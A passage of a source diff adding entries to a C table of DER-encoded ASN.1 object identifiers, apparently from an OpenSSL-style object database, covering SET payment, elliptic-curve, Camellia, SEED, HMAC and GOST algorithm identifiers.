+0x67,0x2A,0x00,0x05,                         /* [3924] OBJ_setct_PIData */
+0x67,0x2A,0x00,0x06,                         /* [3928] OBJ_setct_PIDataUnsigned */
+0x67,0x2A,0x00,0x07,                         /* [3932] OBJ_setct_HODInput */
+0x67,0x2A,0x00,0x08,                         /* [3936] OBJ_setct_AuthResBaggage */
+0x67,0x2A,0x00,0x09,                         /* [3940] OBJ_setct_AuthRevReqBaggage */
+0x67,0x2A,0x00,0x0A,                         /* [3944] OBJ_setct_AuthRevResBaggage */
+0x67,0x2A,0x00,0x0B,                         /* [3948] OBJ_setct_CapTokenSeq */
+0x67,0x2A,0x00,0x0C,                         /* [3952] OBJ_setct_PInitResData */
+0x67,0x2A,0x00,0x0D,                         /* [3956] OBJ_setct_PI_TBS */
+0x67,0x2A,0x00,0x0E,                         /* [3960] OBJ_setct_PResData */
+0x67,0x2A,0x00,0x10,                         /* [3964] OBJ_setct_AuthReqTBS */
+0x67,0x2A,0x00,0x11,                         /* [3968] OBJ_setct_AuthResTBS */
+0x67,0x2A,0x00,0x12,                         /* [3972] OBJ_setct_AuthResTBSX */
+0x67,0x2A,0x00,0x13,                         /* [3976] OBJ_setct_AuthTokenTBS */
+0x67,0x2A,0x00,0x14,                         /* [3980] OBJ_setct_CapTokenData */
+0x67,0x2A,0x00,0x15,                         /* [3984] OBJ_setct_CapTokenTBS */
+0x67,0x2A,0x00,0x16,                         /* [3988] OBJ_setct_AcqCardCodeMsg */
+0x67,0x2A,0x00,0x17,                         /* [3992] OBJ_setct_AuthRevReqTBS */
+0x67,0x2A,0x00,0x18,                         /* [3996] OBJ_setct_AuthRevResData */
+0x67,0x2A,0x00,0x19,                         /* [4000] OBJ_setct_AuthRevResTBS */
+0x67,0x2A,0x00,0x1A,                         /* [4004] OBJ_setct_CapReqTBS */
+0x67,0x2A,0x00,0x1B,                         /* [4008] OBJ_setct_CapReqTBSX */
+0x67,0x2A,0x00,0x1C,                         /* [4012] OBJ_setct_CapResData */
+0x67,0x2A,0x00,0x1D,                         /* [4016] OBJ_setct_CapRevReqTBS */
+0x67,0x2A,0x00,0x1E,                         /* [4020] OBJ_setct_CapRevReqTBSX */
+0x67,0x2A,0x00,0x1F,                         /* [4024] OBJ_setct_CapRevResData */
+0x67,0x2A,0x00,0x20,                         /* [4028] OBJ_setct_CredReqTBS */
+0x67,0x2A,0x00,0x21,                         /* [4032] OBJ_setct_CredReqTBSX */
+0x67,0x2A,0x00,0x22,                         /* [4036] OBJ_setct_CredResData */
+0x67,0x2A,0x00,0x23,                         /* [4040] OBJ_setct_CredRevReqTBS */
+0x67,0x2A,0x00,0x24,                         /* [4044] OBJ_setct_CredRevReqTBSX */
+0x67,0x2A,0x00,0x25,                         /* [4048] OBJ_setct_CredRevResData */
+0x67,0x2A,0x00,0x26,                         /* [4052] OBJ_setct_PCertReqData */
+0x67,0x2A,0x00,0x27,                         /* [4056] OBJ_setct_PCertResTBS */
+0x67,0x2A,0x00,0x28,                         /* [4060] OBJ_setct_BatchAdminReqData */
+0x67,0x2A,0x00,0x29,                         /* [4064] OBJ_setct_BatchAdminResData */
+0x67,0x2A,0x00,0x2A,                         /* [4068] OBJ_setct_CardCInitResTBS */
+0x67,0x2A,0x00,0x2B,                         /* [4072] OBJ_setct_MeAqCInitResTBS */
+0x67,0x2A,0x00,0x2C,                         /* [4076] OBJ_setct_RegFormResTBS */
+0x67,0x2A,0x00,0x2D,                         /* [4080] OBJ_setct_CertReqData */
+0x67,0x2A,0x00,0x2E,                         /* [4084] OBJ_setct_CertReqTBS */
+0x67,0x2A,0x00,0x2F,                         /* [4088] OBJ_setct_CertResData */
+0x67,0x2A,0x00,0x30,                         /* [4092] OBJ_setct_CertInqReqTBS */
+0x67,0x2A,0x00,0x31,                         /* [4096] OBJ_setct_ErrorTBS */
+0x67,0x2A,0x00,0x32,                         /* [4100] OBJ_setct_PIDualSignedTBE */
+0x67,0x2A,0x00,0x33,                         /* [4104] OBJ_setct_PIUnsignedTBE */
+0x67,0x2A,0x00,0x34,                         /* [4108] OBJ_setct_AuthReqTBE */
+0x67,0x2A,0x00,0x35,                         /* [4112] OBJ_setct_AuthResTBE */
+0x67,0x2A,0x00,0x36,                         /* [4116] OBJ_setct_AuthResTBEX */
+0x67,0x2A,0x00,0x37,                         /* [4120] OBJ_setct_AuthTokenTBE */
+0x67,0x2A,0x00,0x38,                         /* [4124] OBJ_setct_CapTokenTBE */
+0x67,0x2A,0x00,0x39,                         /* [4128] OBJ_setct_CapTokenTBEX */
+0x67,0x2A,0x00,0x3A,                         /* [4132] OBJ_setct_AcqCardCodeMsgTBE */
+0x67,0x2A,0x00,0x3B,                         /* [4136] OBJ_setct_AuthRevReqTBE */
+0x67,0x2A,0x00,0x3C,                         /* [4140] OBJ_setct_AuthRevResTBE */
+0x67,0x2A,0x00,0x3D,                         /* [4144] OBJ_setct_AuthRevResTBEB */
+0x67,0x2A,0x00,0x3E,                         /* [4148] OBJ_setct_CapReqTBE */
+0x67,0x2A,0x00,0x3F,                         /* [4152] OBJ_setct_CapReqTBEX */
+0x67,0x2A,0x00,0x40,                         /* [4156] OBJ_setct_CapResTBE */
+0x67,0x2A,0x00,0x41,                         /* [4160] OBJ_setct_CapRevReqTBE */
+0x67,0x2A,0x00,0x42,                         /* [4164] OBJ_setct_CapRevReqTBEX */
+0x67,0x2A,0x00,0x43,                         /* [4168] OBJ_setct_CapRevResTBE */
+0x67,0x2A,0x00,0x44,                         /* [4172] OBJ_setct_CredReqTBE */
+0x67,0x2A,0x00,0x45,                         /* [4176] OBJ_setct_CredReqTBEX */
+0x67,0x2A,0x00,0x46,                         /* [4180] OBJ_setct_CredResTBE */
+0x67,0x2A,0x00,0x47,                         /* [4184] OBJ_setct_CredRevReqTBE */
+0x67,0x2A,0x00,0x48,                         /* [4188] OBJ_setct_CredRevReqTBEX */
+0x67,0x2A,0x00,0x49,                         /* [4192] OBJ_setct_CredRevResTBE */
+0x67,0x2A,0x00,0x4A,                         /* [4196] OBJ_setct_BatchAdminReqTBE */
+0x67,0x2A,0x00,0x4B,                         /* [4200] OBJ_setct_BatchAdminResTBE */
+0x67,0x2A,0x00,0x4C,                         /* [4204] OBJ_setct_RegFormReqTBE */
+0x67,0x2A,0x00,0x4D,                         /* [4208] OBJ_setct_CertReqTBE */
+0x67,0x2A,0x00,0x4E,                         /* [4212] OBJ_setct_CertReqTBEX */
+0x67,0x2A,0x00,0x4F,                         /* [4216] OBJ_setct_CertResTBE */
+0x67,0x2A,0x00,0x50,                         /* [4220] OBJ_setct_CRLNotificationTBS */
+0x67,0x2A,0x00,0x51,                         /* [4224] OBJ_setct_CRLNotificationResTBS */
+0x67,0x2A,0x00,0x52,                         /* [4228] OBJ_setct_BCIDistributionTBS */
+0x67,0x2A,0x01,0x01,                         /* [4232] OBJ_setext_genCrypt */
+0x67,0x2A,0x01,0x03,                         /* [4236] OBJ_setext_miAuth */
+0x67,0x2A,0x01,0x04,                         /* [4240] OBJ_setext_pinSecure */
+0x67,0x2A,0x01,0x05,                         /* [4244] OBJ_setext_pinAny */
+0x67,0x2A,0x01,0x07,                         /* [4248] OBJ_setext_track2 */
+0x67,0x2A,0x01,0x08,                         /* [4252] OBJ_setext_cv */
+0x67,0x2A,0x05,0x00,                         /* [4256] OBJ_set_policy_root */
+0x67,0x2A,0x07,0x00,                         /* [4260] OBJ_setCext_hashedRoot */
+0x67,0x2A,0x07,0x01,                         /* [4264] OBJ_setCext_certType */
+0x67,0x2A,0x07,0x02,                         /* [4268] OBJ_setCext_merchData */
+0x67,0x2A,0x07,0x03,                         /* [4272] OBJ_setCext_cCertRequired */
+0x67,0x2A,0x07,0x04,                         /* [4276] OBJ_setCext_tunneling */
+0x67,0x2A,0x07,0x05,                         /* [4280] OBJ_setCext_setExt */
+0x67,0x2A,0x07,0x06,                         /* [4284] OBJ_setCext_setQualf */
+0x67,0x2A,0x07,0x07,                         /* [4288] OBJ_setCext_PGWYcapabilities */
+0x67,0x2A,0x07,0x08,                         /* [4292] OBJ_setCext_TokenIdentifier */
+0x67,0x2A,0x07,0x09,                         /* [4296] OBJ_setCext_Track2Data */
+0x67,0x2A,0x07,0x0A,                         /* [4300] OBJ_setCext_TokenType */
+0x67,0x2A,0x07,0x0B,                         /* [4304] OBJ_setCext_IssuerCapabilities */
+0x67,0x2A,0x03,0x00,                         /* [4308] OBJ_setAttr_Cert */
+0x67,0x2A,0x03,0x01,                         /* [4312] OBJ_setAttr_PGWYcap */
+0x67,0x2A,0x03,0x02,                         /* [4316] OBJ_setAttr_TokenType */
+0x67,0x2A,0x03,0x03,                         /* [4320] OBJ_setAttr_IssCap */
+0x67,0x2A,0x03,0x00,0x00,                    /* [4324] OBJ_set_rootKeyThumb */
+0x67,0x2A,0x03,0x00,0x01,                    /* [4329] OBJ_set_addPolicy */
+0x67,0x2A,0x03,0x02,0x01,                    /* [4334] OBJ_setAttr_Token_EMV */
+0x67,0x2A,0x03,0x02,0x02,                    /* [4339] OBJ_setAttr_Token_B0Prime */
+0x67,0x2A,0x03,0x03,0x03,                    /* [4344] OBJ_setAttr_IssCap_CVM */
+0x67,0x2A,0x03,0x03,0x04,                    /* [4349] OBJ_setAttr_IssCap_T2 */
+0x67,0x2A,0x03,0x03,0x05,                    /* [4354] OBJ_setAttr_IssCap_Sig */
+0x67,0x2A,0x03,0x03,0x03,0x01,               /* [4359] OBJ_setAttr_GenCryptgrm */
+0x67,0x2A,0x03,0x03,0x04,0x01,               /* [4365] OBJ_setAttr_T2Enc */
+0x67,0x2A,0x03,0x03,0x04,0x02,               /* [4371] OBJ_setAttr_T2cleartxt */
+0x67,0x2A,0x03,0x03,0x05,0x01,               /* [4377] OBJ_setAttr_TokICCsig */
+0x67,0x2A,0x03,0x03,0x05,0x02,               /* [4383] OBJ_setAttr_SecDevSig */
+0x67,0x2A,0x08,0x01,                         /* [4389] OBJ_set_brand_IATA_ATA */
+0x67,0x2A,0x08,0x1E,                         /* [4393] OBJ_set_brand_Diners */
+0x67,0x2A,0x08,0x22,                         /* [4397] OBJ_set_brand_AmericanExpress */
+0x67,0x2A,0x08,0x23,                         /* [4401] OBJ_set_brand_JCB */
+0x67,0x2A,0x08,0x04,                         /* [4405] OBJ_set_brand_Visa */
+0x67,0x2A,0x08,0x05,                         /* [4409] OBJ_set_brand_MasterCard */
+0x67,0x2A,0x08,0xAE,0x7B,                    /* [4413] OBJ_set_brand_Novus */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x03,0x0A,     /* [4418] OBJ_des_cdmf */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x01,0x06,/* [4426] OBJ_rsaOAEPEncryptionSET */
+0x67,                                        /* [4435] OBJ_international_organizations */
+0x2B,0x06,0x01,0x04,0x01,0x82,0x37,0x14,0x02,0x02,/* [4436] OBJ_ms_smartcard_login */
+0x2B,0x06,0x01,0x04,0x01,0x82,0x37,0x14,0x02,0x03,/* [4446] OBJ_ms_upn */
+0x55,0x04,0x09,                              /* [4456] OBJ_streetAddress */
+0x55,0x04,0x11,                              /* [4459] OBJ_postalCode */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x15,          /* [4462] OBJ_id_ppl */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x01,0x0E,     /* [4469] OBJ_proxyCertInfo */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x15,0x00,     /* [4477] OBJ_id_ppl_anyLanguage */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x15,0x01,     /* [4485] OBJ_id_ppl_inheritAll */
+0x55,0x1D,0x1E,                              /* [4493] OBJ_name_constraints */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x15,0x02,     /* [4496] OBJ_Independent */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x01,0x0B,/* [4504] OBJ_sha256WithRSAEncryption */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x01,0x0C,/* [4513] OBJ_sha384WithRSAEncryption */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x01,0x0D,/* [4522] OBJ_sha512WithRSAEncryption */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x01,0x0E,/* [4531] OBJ_sha224WithRSAEncryption */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x02,0x01,/* [4540] OBJ_sha256 */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x02,0x02,/* [4549] OBJ_sha384 */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x02,0x03,/* [4558] OBJ_sha512 */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x02,0x04,/* [4567] OBJ_sha224 */
+0x2B,                                        /* [4576] OBJ_identified_organization */
+0x2B,0x81,0x04,                              /* [4577] OBJ_certicom_arc */
+0x67,0x2B,                                   /* [4580] OBJ_wap */
+0x67,0x2B,0x01,                              /* [4582] OBJ_wap_wsg */
+0x2A,0x86,0x48,0xCE,0x3D,0x01,0x02,0x03,     /* [4585] OBJ_X9_62_id_characteristic_two_basis */
+0x2A,0x86,0x48,0xCE,0x3D,0x01,0x02,0x03,0x01,/* [4593] OBJ_X9_62_onBasis */
+0x2A,0x86,0x48,0xCE,0x3D,0x01,0x02,0x03,0x02,/* [4602] OBJ_X9_62_tpBasis */
+0x2A,0x86,0x48,0xCE,0x3D,0x01,0x02,0x03,0x03,/* [4611] OBJ_X9_62_ppBasis */
+0x2A,0x86,0x48,0xCE,0x3D,0x03,0x00,0x01,     /* [4620] OBJ_X9_62_c2pnb163v1 */
+0x2A,0x86,0x48,0xCE,0x3D,0x03,0x00,0x02,     /* [4628] OBJ_X9_62_c2pnb163v2 */
+0x2A,0x86,0x48,0xCE,0x3D,0x03,0x00,0x03,     /* [4636] OBJ_X9_62_c2pnb163v3 */
+0x2A,0x86,0x48,0xCE,0x3D,0x03,0x00,0x04,     /* [4644] OBJ_X9_62_c2pnb176v1 */
+0x2A,0x86,0x48,0xCE,0x3D,0x03,0x00,0x05,     /* [4652] OBJ_X9_62_c2tnb191v1 */
+0x2A,0x86,0x48,0xCE,0x3D,0x03,0x00,0x06,     /* [4660] OBJ_X9_62_c2tnb191v2 */
+0x2A,0x86,0x48,0xCE,0x3D,0x03,0x00,0x07,     /* [4668] OBJ_X9_62_c2tnb191v3 */
+0x2A,0x86,0x48,0xCE,0x3D,0x03,0x00,0x08,     /* [4676] OBJ_X9_62_c2onb191v4 */
+0x2A,0x86,0x48,0xCE,0x3D,0x03,0x00,0x09,     /* [4684] OBJ_X9_62_c2onb191v5 */
+0x2A,0x86,0x48,0xCE,0x3D,0x03,0x00,0x0A,     /* [4692] OBJ_X9_62_c2pnb208w1 */
+0x2A,0x86,0x48,0xCE,0x3D,0x03,0x00,0x0B,     /* [4700] OBJ_X9_62_c2tnb239v1 */
+0x2A,0x86,0x48,0xCE,0x3D,0x03,0x00,0x0C,     /* [4708] OBJ_X9_62_c2tnb239v2 */
+0x2A,0x86,0x48,0xCE,0x3D,0x03,0x00,0x0D,     /* [4716] OBJ_X9_62_c2tnb239v3 */
+0x2A,0x86,0x48,0xCE,0x3D,0x03,0x00,0x0E,     /* [4724] OBJ_X9_62_c2onb239v4 */
+0x2A,0x86,0x48,0xCE,0x3D,0x03,0x00,0x0F,     /* [4732] OBJ_X9_62_c2onb239v5 */
+0x2A,0x86,0x48,0xCE,0x3D,0x03,0x00,0x10,     /* [4740] OBJ_X9_62_c2pnb272w1 */
+0x2A,0x86,0x48,0xCE,0x3D,0x03,0x00,0x11,     /* [4748] OBJ_X9_62_c2pnb304w1 */
+0x2A,0x86,0x48,0xCE,0x3D,0x03,0x00,0x12,     /* [4756] OBJ_X9_62_c2tnb359v1 */
+0x2A,0x86,0x48,0xCE,0x3D,0x03,0x00,0x13,     /* [4764] OBJ_X9_62_c2pnb368w1 */
+0x2A,0x86,0x48,0xCE,0x3D,0x03,0x00,0x14,     /* [4772] OBJ_X9_62_c2tnb431r1 */
+0x2B,0x81,0x04,0x00,0x06,                    /* [4780] OBJ_secp112r1 */
+0x2B,0x81,0x04,0x00,0x07,                    /* [4785] OBJ_secp112r2 */
+0x2B,0x81,0x04,0x00,0x1C,                    /* [4790] OBJ_secp128r1 */
+0x2B,0x81,0x04,0x00,0x1D,                    /* [4795] OBJ_secp128r2 */
+0x2B,0x81,0x04,0x00,0x09,                    /* [4800] OBJ_secp160k1 */
+0x2B,0x81,0x04,0x00,0x08,                    /* [4805] OBJ_secp160r1 */
+0x2B,0x81,0x04,0x00,0x1E,                    /* [4810] OBJ_secp160r2 */
+0x2B,0x81,0x04,0x00,0x1F,                    /* [4815] OBJ_secp192k1 */
+0x2B,0x81,0x04,0x00,0x20,                    /* [4820] OBJ_secp224k1 */
+0x2B,0x81,0x04,0x00,0x21,                    /* [4825] OBJ_secp224r1 */
+0x2B,0x81,0x04,0x00,0x0A,                    /* [4830] OBJ_secp256k1 */
+0x2B,0x81,0x04,0x00,0x22,                    /* [4835] OBJ_secp384r1 */
+0x2B,0x81,0x04,0x00,0x23,                    /* [4840] OBJ_secp521r1 */
+0x2B,0x81,0x04,0x00,0x04,                    /* [4845] OBJ_sect113r1 */
+0x2B,0x81,0x04,0x00,0x05,                    /* [4850] OBJ_sect113r2 */
+0x2B,0x81,0x04,0x00,0x16,                    /* [4855] OBJ_sect131r1 */
+0x2B,0x81,0x04,0x00,0x17,                    /* [4860] OBJ_sect131r2 */
+0x2B,0x81,0x04,0x00,0x01,                    /* [4865] OBJ_sect163k1 */
+0x2B,0x81,0x04,0x00,0x02,                    /* [4870] OBJ_sect163r1 */
+0x2B,0x81,0x04,0x00,0x0F,                    /* [4875] OBJ_sect163r2 */
+0x2B,0x81,0x04,0x00,0x18,                    /* [4880] OBJ_sect193r1 */
+0x2B,0x81,0x04,0x00,0x19,                    /* [4885] OBJ_sect193r2 */
+0x2B,0x81,0x04,0x00,0x1A,                    /* [4890] OBJ_sect233k1 */
+0x2B,0x81,0x04,0x00,0x1B,                    /* [4895] OBJ_sect233r1 */
+0x2B,0x81,0x04,0x00,0x03,                    /* [4900] OBJ_sect239k1 */
+0x2B,0x81,0x04,0x00,0x10,                    /* [4905] OBJ_sect283k1 */
+0x2B,0x81,0x04,0x00,0x11,                    /* [4910] OBJ_sect283r1 */
+0x2B,0x81,0x04,0x00,0x24,                    /* [4915] OBJ_sect409k1 */
+0x2B,0x81,0x04,0x00,0x25,                    /* [4920] OBJ_sect409r1 */
+0x2B,0x81,0x04,0x00,0x26,                    /* [4925] OBJ_sect571k1 */
+0x2B,0x81,0x04,0x00,0x27,                    /* [4930] OBJ_sect571r1 */
+0x67,0x2B,0x01,0x04,0x01,                    /* [4935] OBJ_wap_wsg_idm_ecid_wtls1 */
+0x67,0x2B,0x01,0x04,0x03,                    /* [4940] OBJ_wap_wsg_idm_ecid_wtls3 */
+0x67,0x2B,0x01,0x04,0x04,                    /* [4945] OBJ_wap_wsg_idm_ecid_wtls4 */
+0x67,0x2B,0x01,0x04,0x05,                    /* [4950] OBJ_wap_wsg_idm_ecid_wtls5 */
+0x67,0x2B,0x01,0x04,0x06,                    /* [4955] OBJ_wap_wsg_idm_ecid_wtls6 */
+0x67,0x2B,0x01,0x04,0x07,                    /* [4960] OBJ_wap_wsg_idm_ecid_wtls7 */
+0x67,0x2B,0x01,0x04,0x08,                    /* [4965] OBJ_wap_wsg_idm_ecid_wtls8 */
+0x67,0x2B,0x01,0x04,0x09,                    /* [4970] OBJ_wap_wsg_idm_ecid_wtls9 */
+0x67,0x2B,0x01,0x04,0x0A,                    /* [4975] OBJ_wap_wsg_idm_ecid_wtls10 */
+0x67,0x2B,0x01,0x04,0x0B,                    /* [4980] OBJ_wap_wsg_idm_ecid_wtls11 */
+0x67,0x2B,0x01,0x04,0x0C,                    /* [4985] OBJ_wap_wsg_idm_ecid_wtls12 */
+0x55,0x1D,0x20,0x00,                         /* [4990] OBJ_any_policy */
+0x55,0x1D,0x21,                              /* [4994] OBJ_policy_mappings */
+0x55,0x1D,0x36,                              /* [4997] OBJ_inhibit_any_policy */
+0x2A,0x83,0x08,0x8C,0x9A,0x4B,0x3D,0x01,0x01,0x01,0x02,/* [5000] OBJ_camellia_128_cbc */
+0x2A,0x83,0x08,0x8C,0x9A,0x4B,0x3D,0x01,0x01,0x01,0x03,/* [5011] OBJ_camellia_192_cbc */
+0x2A,0x83,0x08,0x8C,0x9A,0x4B,0x3D,0x01,0x01,0x01,0x04,/* [5022] OBJ_camellia_256_cbc */
+0x03,0xA2,0x31,0x05,0x03,0x01,0x09,0x01,     /* [5033] OBJ_camellia_128_ecb */
+0x03,0xA2,0x31,0x05,0x03,0x01,0x09,0x15,     /* [5041] OBJ_camellia_192_ecb */
+0x03,0xA2,0x31,0x05,0x03,0x01,0x09,0x29,     /* [5049] OBJ_camellia_256_ecb */
+0x03,0xA2,0x31,0x05,0x03,0x01,0x09,0x04,     /* [5057] OBJ_camellia_128_cfb128 */
+0x03,0xA2,0x31,0x05,0x03,0x01,0x09,0x18,     /* [5065] OBJ_camellia_192_cfb128 */
+0x03,0xA2,0x31,0x05,0x03,0x01,0x09,0x2C,     /* [5073] OBJ_camellia_256_cfb128 */
+0x03,0xA2,0x31,0x05,0x03,0x01,0x09,0x03,     /* [5081] OBJ_camellia_128_ofb128 */
+0x03,0xA2,0x31,0x05,0x03,0x01,0x09,0x17,     /* [5089] OBJ_camellia_192_ofb128 */
+0x03,0xA2,0x31,0x05,0x03,0x01,0x09,0x2B,     /* [5097] OBJ_camellia_256_ofb128 */
+0x55,0x1D,0x09,                              /* [5105] OBJ_subject_directory_attributes */
+0x55,0x1D,0x1C,                              /* [5108] OBJ_issuing_distribution_point */
+0x55,0x1D,0x1D,                              /* [5111] OBJ_certificate_issuer */
+0x2A,0x83,0x1A,0x8C,0x9A,0x44,               /* [5114] OBJ_kisa */
+0x2A,0x83,0x1A,0x8C,0x9A,0x44,0x01,0x03,     /* [5120] OBJ_seed_ecb */
+0x2A,0x83,0x1A,0x8C,0x9A,0x44,0x01,0x04,     /* [5128] OBJ_seed_cbc */
+0x2A,0x83,0x1A,0x8C,0x9A,0x44,0x01,0x06,     /* [5136] OBJ_seed_ofb128 */
+0x2A,0x83,0x1A,0x8C,0x9A,0x44,0x01,0x05,     /* [5144] OBJ_seed_cfb128 */
+0x2B,0x06,0x01,0x05,0x05,0x08,0x01,0x01,     /* [5152] OBJ_hmac_md5 */
+0x2B,0x06,0x01,0x05,0x05,0x08,0x01,0x02,     /* [5160] OBJ_hmac_sha1 */
+0x2A,0x86,0x48,0x86,0xF6,0x7D,0x07,0x42,0x0D,/* [5168] OBJ_id_PasswordBasedMAC */
+0x2A,0x86,0x48,0x86,0xF6,0x7D,0x07,0x42,0x1E,/* [5177] OBJ_id_DHBasedMac */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x04,0x10,     /* [5186] OBJ_id_it_suppLangTags */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x30,0x05,     /* [5194] OBJ_caRepository */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x01,0x09,/* [5202] OBJ_id_smime_ct_compressedData */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x01,0x1B,/* [5213] OBJ_id_ct_asciiTextWithCRLF */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x01,0x05,/* [5224] OBJ_id_aes128_wrap */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x01,0x19,/* [5233] OBJ_id_aes192_wrap */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x01,0x2D,/* [5242] OBJ_id_aes256_wrap */
+0x2A,0x86,0x48,0xCE,0x3D,0x04,0x02,          /* [5251] OBJ_ecdsa_with_Recommended */
+0x2A,0x86,0x48,0xCE,0x3D,0x04,0x03,          /* [5258] OBJ_ecdsa_with_Specified */
+0x2A,0x86,0x48,0xCE,0x3D,0x04,0x03,0x01,     /* [5265] OBJ_ecdsa_with_SHA224 */
+0x2A,0x86,0x48,0xCE,0x3D,0x04,0x03,0x02,     /* [5273] OBJ_ecdsa_with_SHA256 */
+0x2A,0x86,0x48,0xCE,0x3D,0x04,0x03,0x03,     /* [5281] OBJ_ecdsa_with_SHA384 */
+0x2A,0x86,0x48,0xCE,0x3D,0x04,0x03,0x04,     /* [5289] OBJ_ecdsa_with_SHA512 */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x02,0x06,     /* [5297] OBJ_hmacWithMD5 */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x02,0x08,     /* [5305] OBJ_hmacWithSHA224 */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x02,0x09,     /* [5313] OBJ_hmacWithSHA256 */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x02,0x0A,     /* [5321] OBJ_hmacWithSHA384 */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x02,0x0B,     /* [5329] OBJ_hmacWithSHA512 */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x03,0x01,/* [5337] OBJ_dsa_with_SHA224 */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x03,0x02,/* [5346] OBJ_dsa_with_SHA256 */
+0x28,0xCF,0x06,0x03,0x00,0x37,               /* [5355] OBJ_whirlpool */
+0x2A,0x85,0x03,0x02,0x02,                    /* [5361] OBJ_cryptopro */
+0x2A,0x85,0x03,0x02,0x09,                    /* [5366] OBJ_cryptocom */
+0x2A,0x85,0x03,0x02,0x02,0x03,               /* [5371] OBJ_id_GostR3411_94_with_GostR3410_2001 */
+0x2A,0x85,0x03,0x02,0x02,0x04,               /* [5377] OBJ_id_GostR3411_94_with_GostR3410_94 */
+0x2A,0x85,0x03,0x02,0x02,0x09,               /* [5383] OBJ_id_GostR3411_94 */
+0x2A,0x85,0x03,0x02,0x02,0x0A,               /* [5389] OBJ_id_HMACGostR3411_94 */
+0x2A,0x85,0x03,0x02,0x02,0x13,               /* [5395] OBJ_id_GostR3410_2001 */
+0x2A,0x85,0x03,0x02,0x02,0x14,               /* [5401] OBJ_id_GostR3410_94 */
+0x2A,0x85,0x03,0x02,0x02,0x15,               /* [5407] OBJ_id_Gost28147_89 */
+0x2A,0x85,0x03,0x02,0x02,0x16,               /* [5413] OBJ_id_Gost28147_89_MAC */
+0x2A,0x85,0x03,0x02,0x02,0x17,               /* [5419] OBJ_id_GostR3411_94_prf */
+0x2A,0x85,0x03,0x02,0x02,0x62,               /* [5425] OBJ_id_GostR3410_2001DH */
+0x2A,0x85,0x03,0x02,0x02,0x63,               /* [5431] OBJ_id_GostR3410_94DH */
+0x2A,0x85,0x03,0x02,0x02,0x0E,0x01,          /* [5437] OBJ_id_Gost28147_89_CryptoPro_KeyMeshing */
+0x2A,0x85,0x03,0x02,0x02,0x0E,0x00,          /* [5444] OBJ_id_Gost28147_89_None_KeyMeshing */
+0x2A,0x85,0x03,0x02,0x02,0x1E,0x00,          /* [5451] OBJ_id_GostR3411_94_TestParamSet */
+0x2A,0x85,0x03,0x02,0x02,0x1E,0x01,          /* [5458] OBJ_id_GostR3411_94_CryptoProParamSet */
+0x2A,0x85,0x03,0x02,0x02,0x1F,0x00,          /* [5465] OBJ_id_Gost28147_89_TestParamSet */
+0x2A,0x85,0x03,0x02,0x02,0x1F,0x01,          /* [5472] OBJ_id_Gost28147_89_CryptoPro_A_ParamSet */
+0x2A,0x85,0x03,0x02,0x02,0x1F,0x02,          /* [5479] OBJ_id_Gost28147_89_CryptoPro_B_ParamSet */
+0x2A,0x85,0x03,0x02,0x02,0x1F,0x03,          /* [5486] OBJ_id_Gost28147_89_CryptoPro_C_ParamSet */
+0x2A,0x85,0x03,0x02,0x02,0x1F,0x04,          /* [5493] OBJ_id_Gost28147_89_CryptoPro_D_ParamSet */
+0x2A,0x85,0x03,0x02,0x02,0x1F,0x05,          /* [5500] OBJ_id_Gost28147_89_CryptoPro_Oscar_1_1_ParamSet */
+0x2A,0x85,0x03,0x02,0x02,0x1F,0x06,          /* [5507] OBJ_id_Gost28147_89_CryptoPro_Oscar_1_0_ParamSet */
+0x2A,0x85,0x03,0x02,0x02,0x1F,0x07,          /* [5514] OBJ_id_Gost28147_89_CryptoPro_RIC_1_ParamSet */
+0x2A,0x85,0x03,0x02,0x02,0x20,0x00,          /* [5521] OBJ_id_GostR3410_94_TestParamSet */
+0x2A,0x85,0x03,0x02,0x02,0x20,0x02,          /* [5528] OBJ_id_GostR3410_94_CryptoPro_A_ParamSet */
+0x2A,0x85,0x03,0x02,0x02,0x20,0x03,          /* [5535] OBJ_id_GostR3410_94_CryptoPro_B_ParamSet */
+0x2A,0x85,0x03,0x02,0x02,0x20,0x04,          /* [5542] OBJ_id_GostR3410_94_CryptoPro_C_ParamSet */
+0x2A,0x85,0x03,0x02,0x02,0x20,0x05,          /* [5549] OBJ_id_GostR3410_94_CryptoPro_D_ParamSet */
+0x2A,0x85,0x03,0x02,0x02,0x21,0x01,          /* [5556] OBJ_id_GostR3410_94_CryptoPro_XchA_ParamSet */
+0x2A,0x85,0x03,0x02,0x02,0x21,0x02,          /* [5563] OBJ_id_GostR3410_94_CryptoPro_XchB_ParamSet */
+0x2A,0x85,0x03,0x02,0x02,0x21,0x03,          /* [5570] OBJ_id_GostR3410_94_CryptoPro_XchC_ParamSet */
+0x2A,0x85,0x03,0x02,0x02,0x23,0x00,          /* [5577] OBJ_id_GostR3410_2001_TestParamSet */
+0x2A,0x85,0x03,0x02,0x02,0x23,0x01,          /* [5584] OBJ_id_GostR3410_2001_CryptoPro_A_ParamSet */
